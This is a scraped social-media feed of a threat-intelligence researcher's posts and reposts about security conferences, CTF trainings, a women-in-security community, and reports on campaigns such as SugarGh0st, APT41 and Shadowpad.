Security researcher
@TalosSecurity
/ Ex-Googler / Black Hat & HITCON Review Board / Organizer of
@rhacklette41
. These tweets are my own not my employer's.
🚨 We discovered that some versions of WeChat were vulnerable to CVE-2023-3420 due to the outdated V8 engine in Xweb. We reported this to the vendor in April. WeChat users should update to the latest version to stay secure. More details in
#vulnerability
After 3 years at Google TAG, I'm delighted to announce an exciting new chapter in my career. I'm joining
@TalosSecurity
to conduct threat intelligence research and counter threat actors. Looking forward to collaborating with brilliant minds and growing in this new adventure.
It was such a honor to present at the first ever
@pivot_con
! Also proud of myself for doing the panel ❤️ I had an amazing time there, perfect location, high quality talks and "my people"!! shoutout to the organizer team!! Thank you for the incredible job!
#pivotcon24
Cookie theft is still a common account hijacking technique adopted by criminal groups. Have been tracking & disrupting this group with multiple security teams since I joined Google. Happy to share our results and finding in this blog.
Its hard to find a talk that’s novel, technical and inspiring at the same time but
@orange_8361
can always accomplish that. Definitely one of the best talk I have ever attended.
@hexacon_fr
I’m honored to be recognized as one of the "32 Influential Malware Research Professionals" in the new ebook of . Thank you
@Peerlyst
,
@chihebchebbi201
and to everyone who have supported me!
It was great to see everyone at the CTF crash course of
@rhacklette41
last night! Hopefully everyone learned something useful about reverse engineering! Looking forward to see you again in our next one and solve some challenges together 😃!
Attended my first
@Blackhoodie_RE
workshop and had a wonderful Android reversing training from
@maddiestone
. Also gave a lightening talk about "From Threat Intelligence to Pokemon Master". Thank you for everyone who make this weekend awesome!
@craghuprasad
and I published 2 new blogs about the Sugargh0st campaigns. We are tracking the group as Sneakychef, and named the new RAT found in the campaign SpiceRAT. The group is targeting a wider scope of government entities in EMEA and Asia.
#sugargh0st
#sneakychef
Our threat intel teams continue to look out for and disrupt disinfo campaigns, hacking, and financially motivated abuse, and are working with other companies and relevant government bodies to address these threats.
I have the honor of giving away two passes to the
@BlackHatEvents
Black Hat Asia conference! Priority goes to students and anyone who needs support to attend. PM me if interested.
#BHASIA
So excited and honoured to have this chance to share my research at the very first
#PIVOTcon24
in May!! Thank you to all the crews for organising! Looking forward to seeing all the brilliant people and research!
📢 Yes. It’s here. Absolutely mind blowing. The highlights of the
#PIVOTcon24
#agenda
.
You have goosebumps all over your bodies? Drrrrrrrrumrrrrrrrroll.. 🥁🥁🥁 Go ahead and check them out! We still have some tickets😉
#ThreatIntel
#CTI
🧵1/15
Just got back from my trip to
#BHASIA
and a vacation in Sabah 🏝️☀️ Met so many old and new friends and the talks were amazing! Thanks for everyone who came to our session it was such a heartwarming gathering and I’ve learned from you too! See you all next year!
Can’t believe it’s been 20 years 😬 we are calling for papers for both HITCON CMT in August and the Enterprise in October this time. Looking forward to see all the brilliant submissions!
#HITCON
#HITCONCommunity2024
#HITCONCMT2024
HITCON Community 2024 - Call for Paper
Theme: 20 Years of HITCON: Mind Meld Hacker Spirit from Human to AI
HITCON is celebrating its 20th anniversary this year, marking the evolution from underground gatherings to a renowned hacker conference over the past two decades. The
I will be joining and sharing my experience of founding a women security community at the Women in Security Meet Up in Black Hat Asia on March 29. Welcome everyone to join!
#BHASIA
New blog post from TAG with details of a North Korean campaign targeting security researchers working on vulnerability research and development.
Stay safe out there everyone!
Why bother looking for vulnerabilities when you can just peer over the actor's shoulder beside you? 🤓
@_clem1
is infamously known for being able to track APT's exploit toolkits and we are extremely grateful to have him talk about it as our opening keynote!
#HEXACON2024
Sharing the slides
@ReinforceMagic
and I presented for the Threat Hunting and Campaign tracking 101 session during HITCON 2020 CTI Village Workshop. The talk was only 65 mins but we tried to cover some interesting cases and insights.
WoSec ZH becomes Rhacklette! In March we have officially joined
@defconch
. We are a group of FINTA people in security with the goal to create a protected space for gender minorities in the security industry in Switzerland. We look forward to meeting you in upcoming events.
This year HITCON are going to publish HIT"COIN", a cryptocurrency that you could use on the booths and participating the event. You will be receiving a cold wallet badge to save your HITCOIN.
Black Hat Asia is around 10 days away! I have the honor of giving away two Live Event- Briefings Only or Virtual-Only- Briefings Only passes to the conference! Priority goes to students and anyone who needs support to attend. PM me if interested.
#BHASIA
@BlackHatEvents
🚀 Join us in Zurich for an exciting CTF training program! Boost your cybersecurity skills, solve challenges, and dive into the world of cybersecurity. Open to FINTA individuals in Rhacklette, all skill levels welcome! Register now by writing at rhacklette
@defcon
-switzerland.org
Great find!! The target regions of both campaigns also have overlap (UZ, KZ). Definitely worth to research on more potential connections between xCaon and SpiceRAT.
#spicerat
#sneakychef
#xcaon
#SPEAKER
ANNOUNCEMENT 📢
@ashley_shen_920
from
@FireEye
Specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Co-founded “HITCON GIRLS” – the first security community for women in Taiwan.
Full agenda here
HITCON GIRLS will be holding a smart contract challenge at
#HITB2019AMS
. We will be in Hapox at beurs van berlage during May 9 and 10. Try to solve the challenge and win some coins with us!
The schedule for Black Hat Asia 2023 is now live! It's truly an honor to have served on the review board for 7 years now, and I'm blown away by the number of outstanding submissions we received this year! Check out the lineup of talks here:
#BHAsia
Next up is
@ashley_shen_920
discussing ICEFOG (first reported by
@kaspersky
) - is it a malware family? Is it a threat group? No public reporting since 2014 - what happened?
#FireEyeSummit
Another amazing HITCON is happening this year! Looking forward to see all your outstanding submissions! Haven’t booked the flight but I will most likely be there! Feel free to reach out for a meetup 😊
#HITCON
#HITCONENT2023
【HITCON Enterprise 2023 Call For Paper】
🚀HITCON ENT 2023 theme: Automation Security Ascendancy: Systematic Evolution to Maturity.
Our CFP system is also available now.
🌐
#HITCON
#HITCONENT2023
Thanks for referencing our SugarGh0st blog! The target is indeed very interesting. It is also interesting that they kept using the old domain for months after we published the blog and only have a new domain for the recent campaign.
Artificial intelligence research is of high value to adversaries.
@Proofpoint
recently identified a SugarGh0st RAT campaign targeting US-based organizations involved in AI efforts, including those in academia, private industry, and gov't service.
Brief: .
I enjoyed my time a lot at BlueHatIL so I’m really excited to join the CAB of BlueHat Shanghai. CFP is open until March 31. Dont miss your chance to speak at the very first BlueHat in Asia.
#BlueHat
What an awesome hack the bank CTF evening organised by
@ingnl
!! 🎉🤗 So great to meet so many amazing women! Thank you all for making this possible and see you next time!! ❤️
#infosec
#womenintech
To those in the Switzerland, join our community event in Zurich on June 15th to listen amazing lighting talks from Google Women in Engineering group! (English talks will be in the afternoon!)
Spoiler alert! We will have another CTF training with
@rhacklette41
this Sunday to solve some other reversing challenges on hack the box! This time we will be also doing medium level challenge with windows binary so have your VM ready!
🚀Join us and learn how to solve CTF challenges!
📚We will meet once a month and cover a variety of CTF topics, including but not limited to: Web security, RE, Binary exploitation, Forensics, Crypto.
Each session will include a mix of lecture, hands-on exercises, and discussion.
Join us for our 2 trainings on Web App Pentest 101 on 6th and 10th July after work: How to do a Pentest and what are the challenges of a Security Consultant? Open to FINTA individuals. Register now by writing at rhacklette
@defcon
-switzerland.org
Good to see Chrome is implementing more mitigation to the cookie theft attack. Although malware will still be able to do process injection to bypass the mitigation but pushing this to a more detectable behaviour is also a progress!
#chrome
#cookietheft
With Chrome 127 on Windows, we're introducing enhanced encryption to protect sensitive data, starting with your cookies🍪! This helps protect your personal information and keeps your online accounts secure from hackers. Read more about this protection:
New Blog Post - How I forced a Chinese threat actor to help me with a campaign's attribution by adding it to a new "Taiwan" tab in my APT group mapping spreadsheet
VIDEO: Details of attacks targeting multiple banks, ATMs & Bitcoin services plus the malware, vulnerabilities discovered, and future mitigations presented at
#BHASIA
2018
The research began with detecting abnormal PowerShell commands downloading additional scripts and Cobalt Strike. Interestingly, the threat actor used the “quser” command to avoid operating with other users simultaneously.
#APT41
#cobaltstrike
Interesting
#Mirage
/
#MirageFox
sample 🇨🇳:
af8aa745ba47a4a85f513979cc9e2196 . Signed using fake
@kaspersky
cert. Compiled 30 Nov 2015 13:07:28 UTC
Looks like an operator sets C2 at runtime
./sample.exe [C2 Server] [Port]
(cc:
@ashley_shen_920
)
In addition to Bitdefender’s Crash Handler being abused by Shadowpad, we found Microsoft Office IME binary was also exploited. For privilege escalation, the threat actor crafted a custom loader to inject CVE-2018-0824 code.
#exploit
#shadowpad
Talos assesses with high confidence that the
#YoroTrooper
threat actor likely consists of individuals from Kazakhstan. But that hasn't stopped them from covering their tracks and disguising their origins. More on this threat actor in our latest blog